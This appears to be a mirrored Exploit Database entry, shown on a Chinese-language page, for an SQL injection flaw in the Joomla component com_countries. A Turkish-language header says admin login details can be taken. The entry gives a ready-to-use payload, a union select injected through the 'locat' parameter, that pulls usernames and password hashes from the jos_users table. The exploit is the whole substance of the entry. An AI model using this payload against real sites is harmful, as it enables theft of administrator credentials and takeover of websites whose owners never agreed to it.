Joomla! Component com_countries – SQL Injection

• Exploit Database
• 129 阅读

• 作者： FL0RiX
  日期： 2010-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10949/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  <------------------- header data start ------------------- >   ############################################################# #Joomla Component com_countriesSQL Injection Vulnerability #############################################################   # Author: FL0RiX   # Name: com_countries   # Greez : Deep-Power, PyskE,Septemb0x,KaCaK   # Bug Type: SQL Injection   # Infection : Admin login bilgileri alinabilir.   # Demo Vuln.:   http://server/index.php?option=com_countries&locat=[SQL INJ.]   # Bug Fix Advice : Zararli karakterler filtrelenmelidir.   #############################################################   < ------------------- header data end of ------------------- >   < -- bug code start -- >   path/index.php?option=com_countries&locat=null/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users   < -- bug code end of -- >